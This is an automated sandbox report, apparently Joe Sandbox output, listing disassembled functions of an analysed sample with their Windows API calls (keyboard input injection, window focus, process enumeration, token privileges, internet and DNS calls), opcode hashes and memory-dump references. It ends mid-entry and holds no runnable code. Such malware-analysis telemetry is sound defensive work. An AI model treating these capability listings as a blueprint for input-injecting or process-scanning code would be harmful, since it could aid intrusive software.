                                                  • Instruction Fuzzy Hash: BA314B34D40608AFFF308B25CC85BFDBBA5BB45316F28425AECA4D11D1C3758AC99759
                                                  Function 00C50C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00C50C66
                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00C50C82
                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 00C50CE1
                                                  • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00C50D33
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID:
                                                  • API String ID: 432972143-0
                                                  • Opcode ID: 3e1e0fcf81c7793110e1f3db4ff7fee3b5f53929419c4b131e83b9e147ef3ec8
                                                  • Instruction ID: 13ea19a5ad2cd415bb3c5e78b1bf89c81f7f7cde16af4d6a5d9c0f4a667f8415
                                                  • Opcode Fuzzy Hash: 3e1e0fcf81c7793110e1f3db4ff7fee3b5f53929419c4b131e83b9e147ef3ec8
                                                  • Instruction Fuzzy Hash: 3B3157349002186EFF308B6588047FEBBB5AB46312F24431EECA4D61D1C334AAC9D75A
                                                  Function 00C261C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C261FB
                                                  • __isleadbyte_l.LIBCMT ref: 00C26229
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C26257
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C2628D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                  • String ID:
                                                  • API String ID: 3058430110-0
                                                  • Opcode ID: 7b886152f81d7b17238c766db7330be461244ee31a4fb34f5768cb8823c21d6c
                                                  • Instruction ID: 52afd82f7acbd777296ff0227120a8a78fab57fce6e1a3a5d1713eab75dca955
                                                  • Opcode Fuzzy Hash: 7b886152f81d7b17238c766db7330be461244ee31a4fb34f5768cb8823c21d6c
                                                  • Instruction Fuzzy Hash: F631D230604266EFDF218F65EC44BAE7BA9FF42310F154028E86497591D730EA90D7A0
                                                  Function 00C74EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 00C74F02
                                                    • Part of subcall function 00C53641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C5365B
                                                    • Part of subcall function 00C53641: GetCurrentThreadId.KERNEL32 ref: 00C53662
                                                    • Part of subcall function 00C53641: AttachThreadInput.USER32(00000000,?,00C55005), ref: 00C53669
                                                  • GetCaretPos.USER32(?), ref: 00C74F13
                                                  • ClientToScreen.USER32(00000000,?), ref: 00C74F4E
                                                  • GetForegroundWindow.USER32 ref: 00C74F54
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                  • String ID:
                                                  • API String ID: 2759813231-0
                                                  • Opcode ID: 2686fd4244cb594d7bd9cbd28c4340477c4cd58b97a48cd050585c575e82ceae
                                                  • Instruction ID: c79f41d4fc925dfeded088ad5054a15ad010b471c75c377b1fe1069634ab9abf
                                                  • Opcode Fuzzy Hash: 2686fd4244cb594d7bd9cbd28c4340477c4cd58b97a48cd050585c575e82ceae
                                                  • Instruction Fuzzy Hash: 2C310B71D00108AFDB04EFB5C885AEFB7F9EF99340F1040AAE915E7241DA719E498FA1
                                                  Function 00C53C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00C53C7A
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00C53C88
                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00C53CA8
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C53D52
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: 02299f1d275951f26477e20d89066d81bbce2ddd8c5281fda5cf48fedeb0d92e
                                                  • Instruction ID: 00e72a8997a020b31c080783f6aeb58a977e5069f9083f95ba737342c5c314d1
                                                  • Opcode Fuzzy Hash: 02299f1d275951f26477e20d89066d81bbce2ddd8c5281fda5cf48fedeb0d92e
                                                  • Instruction Fuzzy Hash: A731AF311083499FD304EF24C881ABFBBF8AF95354F40086CF995871A1EB719A8DCB52
                                                  Function 00C7C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF2612: GetWindowLongW.USER32(?,000000EB), ref: 00BF2623
                                                  • GetCursorPos.USER32(?), ref: 00C7C4D2
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00C2B9AB,?,?,?,?,?), ref: 00C7C4E7
                                                  • GetCursorPos.USER32(?), ref: 00C7C534
                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00C2B9AB,?,?,?), ref: 00C7C56E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                  • String ID:
                                                  • API String ID: 2864067406-0
                                                  • Opcode ID: 1c3731409efe940b6c427af46bf5393d372608b680e58af3dd9c1ab18d3b8c4a
                                                  • Instruction ID: a724fccc941c7207137ebaa3b54d605b5ff86af10c5db6ee133e0af683546fd7
                                                  • Opcode Fuzzy Hash: 1c3731409efe940b6c427af46bf5393d372608b680e58af3dd9c1ab18d3b8c4a
                                                  • Instruction Fuzzy Hash: 1931A735500018AFCB55CF98D894FFE7BB6EB09310F44815DF91987261C7326E51EB94
                                                  Function 00C48656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C4810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C48121
                                                    • Part of subcall function 00C4810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C4812B
                                                    • Part of subcall function 00C4810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C4813A
                                                    • Part of subcall function 00C4810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C48141
                                                    • Part of subcall function 00C4810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C48157
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C486A3
                                                  • _memcmp.LIBCMT ref: 00C486C6
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C486FC
                                                  • HeapFree.KERNEL32(00000000), ref: 00C48703
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                  • String ID:
                                                  • API String ID: 1592001646-0
                                                  • Opcode ID: 1f841435f3236a80da8171bc72c1ea96b38bcb04c64dbf2683bb98c66af60eb6
                                                  • Instruction ID: 92bd9a481b9f6f5b64ef6f7e9203c30f8a1245f2db0fe02a6676ddb2a8d25ebc
                                                  • Opcode Fuzzy Hash: 1f841435f3236a80da8171bc72c1ea96b38bcb04c64dbf2683bb98c66af60eb6
                                                  • Instruction Fuzzy Hash: 73219D71E00108EFDB10DFA4C949BEEB7B9FF45304F164059E954AB241DB30AE49DBA4
                                                  Function 00C1098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __setmode.LIBCMT ref: 00C109AE
                                                    • Part of subcall function 00BF5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C57896,?,?,00000000), ref: 00BF5A2C
                                                    • Part of subcall function 00BF5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C57896,?,?,00000000,?,?), ref: 00BF5A50
                                                  • _fprintf.LIBCMT ref: 00C109E5
                                                  • OutputDebugStringW.KERNEL32(?), ref: 00C45DBB
                                                    • Part of subcall function 00C14AAA: _flsall.LIBCMT ref: 00C14AC3
                                                  • __setmode.LIBCMT ref: 00C10A1A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                  • String ID:
                                                  • API String ID: 521402451-0
                                                  • Opcode ID: 510b315de1535350dad68e50c08eced499bdf9068d608412fb1ab396a0b4f6ed
                                                  • Instruction ID: ae9b8e58e06ea912b73d42477cb1229c47ed4db6ff3ad21d77cf6ec62c804823
                                                  • Opcode Fuzzy Hash: 510b315de1535350dad68e50c08eced499bdf9068d608412fb1ab396a0b4f6ed
                                                  • Instruction Fuzzy Hash: 9D1127719042086FD708B3B49C46EFE7BA89F47360F240159F21467183EE705DDA77A5
                                                  Function 00C61767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C617A3
                                                    • Part of subcall function 00C6182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C6184C
                                                    • Part of subcall function 00C6182D: InternetCloseHandle.WININET(00000000), ref: 00C618E9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Internet$CloseConnectHandleOpen
                                                  • String ID:
                                                  • API String ID: 1463438336-0
                                                  • Opcode ID: 876c0c64f23716d0eaeafdcfe9999974f6e97e0e0c1114178688f6e6dd924edc
                                                  • Instruction ID: c66f388125a2e09801115c929cbf3aae08ca87ad57b728275fb8e56e7a095f7f
                                                  • Opcode Fuzzy Hash: 876c0c64f23716d0eaeafdcfe9999974f6e97e0e0c1114178688f6e6dd924edc
                                                  • Instruction Fuzzy Hash: 09210431204601BFEB268F60CC81FBABBA9FF48712F18002EFD1597191DB31D911A7A0
                                                  Function 00C53A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesW.KERNEL32(?,00C7FAC0), ref: 00C53A64
                                                  • GetLastError.KERNEL32 ref: 00C53A73
                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C53A82
                                                  • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C7FAC0), ref: 00C53ADF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectory$AttributesErrorFileLast
                                                  • String ID:
                                                  • API String ID: 2267087916-0
                                                  • Opcode ID: 7d876082c89f052ed42857ae85596cc93ecff2ce04a55dad9c971ede7c0b0d8c
                                                  • Instruction ID: 6747a4266bdd5ee5b0370fbb2163be57cb2cd3f0e4426fe8502e5f90f7c3bb02
                                                  • Opcode Fuzzy Hash: 7d876082c89f052ed42857ae85596cc93ecff2ce04a55dad9c971ede7c0b0d8c
                                                  • Instruction Fuzzy Hash: D721D6381082459F8310DF68C88196B77E4EF153A5F104A6DF8A9C72A2DB31DE8EDB56
                                                  Function 00C4DCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C4F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00C4DCD3,?,?,?,00C4EAC6,00000000,000000EF,00000119,?,?), ref: 00C4F0CB
                                                    • Part of subcall function 00C4F0BC: lstrcpyW.KERNEL32(00000000,?,?,00C4DCD3,?,?,?,00C4EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C4F0F1
                                                    • Part of subcall function 00C4F0BC: lstrcmpiW.KERNEL32(00000000,?,00C4DCD3,?,?,?,00C4EAC6,00000000,000000EF,00000119,?,?), ref: 00C4F122
                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00C4EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C4DCEC
                                                  • lstrcpyW.KERNEL32(00000000,?,?,00C4EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C4DD12
                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C4EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C4DD46
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: lstrcmpilstrcpylstrlen
                                                  • String ID: cdecl
                                                  • API String ID: 4031866154-3896280584
                                                  • Opcode ID: 0f4438ba4b923a9da0cc66eff19e348c6e2be47b1913636cdc39544706216a21
                                                  • Instruction ID: 9920ad8f431c12bdc3e48cc4804ccac79f9d21efd843293ff644946a53207152
                                                  • Opcode Fuzzy Hash: 0f4438ba4b923a9da0cc66eff19e348c6e2be47b1913636cdc39544706216a21
                                                  • Instruction Fuzzy Hash: 92118E3A600305EBCB25AF74DC45E7E77A9FF46350B40813AF816CB2A0EB719991D7A1
                                                  Function 00C250E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00C25101
                                                    • Part of subcall function 00C1571C: __FF_MSGBANNER.LIBCMT ref: 00C15733
                                                    • Part of subcall function 00C1571C: __NMSG_WRITE.LIBCMT ref: 00C1573A
                                                    • Part of subcall function 00C1571C: RtlAllocateHeap.NTDLL(01550000,00000000,00000001,00000000,?,?,?,00C10DD3,?), ref: 00C1575F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap_free
                                                  • String ID:
                                                  • API String ID: 614378929-0
                                                  • Opcode ID: fa7fe5778f4ee98d25dc049677a9c7fe6b219f74209c0ccfdc49f09a14ad7aec
                                                  • Instruction ID: 227151bcb008234b5ac496b4231d79e58a9ce33e38a276281f0b3e151876624d
                                                  • Opcode Fuzzy Hash: fa7fe5778f4ee98d25dc049677a9c7fe6b219f74209c0ccfdc49f09a14ad7aec
                                                  • Instruction Fuzzy Hash: 6711C272908A21AFCF312F75FC457AF37989F063A1F104529F9689A661DE308A91B790
                                                  Function 00BF44A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00BF44CF
                                                    • Part of subcall function 00BF407C: _memset.LIBCMT ref: 00BF40FC
                                                    • Part of subcall function 00BF407C: _wcscpy.LIBCMT ref: 00BF4150
                                                    • Part of subcall function 00BF407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BF4160
                                                  • KillTimer.USER32(?,00000001,?,?), ref: 00BF4524
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BF4533
                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C2D4B9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                  • String ID:
                                                  • API String ID: 1378193009-0
                                                  • Opcode ID: fcbc91f010c584168a1dd71708b9c1b43200587f8f2092a9e26933ad4b6835e1
                                                  • Instruction ID: fd8a060cfeb8f9a2ec648e5a8a96575cd95d1078092c7f61bfa87488074475e8
                                                  • Opcode Fuzzy Hash: fcbc91f010c584168a1dd71708b9c1b43200587f8f2092a9e26933ad4b6835e1
                                                  • Instruction Fuzzy Hash: 5521D370904798AFE732AB249895BFBBBECAF11304F0400DDE79E57141C3746A88CB41
                                                  Function 00C66369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C57896,?,?,00000000), ref: 00BF5A2C
                                                    • Part of subcall function 00BF5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C57896,?,?,00000000,?,?), ref: 00BF5A50
                                                  • gethostbyname.WSOCK32(?,?,?), ref: 00C66399
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C663A4
                                                  • _memmove.LIBCMT ref: 00C663D1
                                                  • inet_ntoa.WSOCK32(?), ref: 00C663DC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                  • String ID:
                                                  • API String ID: 1504782959-0
                                                  • Opcode ID: 21304b27b4aed8e97ceb9d4eaa5c825185202a378436eb202bb6c6064d48ccbb
                                                  • Instruction ID: 998fa89d2f6cf18ebaa349652e79ec2e185e4303a7c512f848d45f9dba8d7b7e
                                                  • Opcode Fuzzy Hash: 21304b27b4aed8e97ceb9d4eaa5c825185202a378436eb202bb6c6064d48ccbb
                                                  • Instruction Fuzzy Hash: 04116031500109AFCB14FBA4DD86DFEB7B8AF05310B1441A9F605A72A1DB30AE18DB62
                                                  Function 00C48B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00C48B61
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C48B73
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C48B89
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C48BA4
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 2ddb175780e8b079bb117d1a9f61ac6c6341059d57fa3df29ad2180dd051c61b
                                                  • Instruction ID: 01df94357e0ebaeb36b120fe0ea40e101301e9ae8a02bf3e482dad2485476a4c
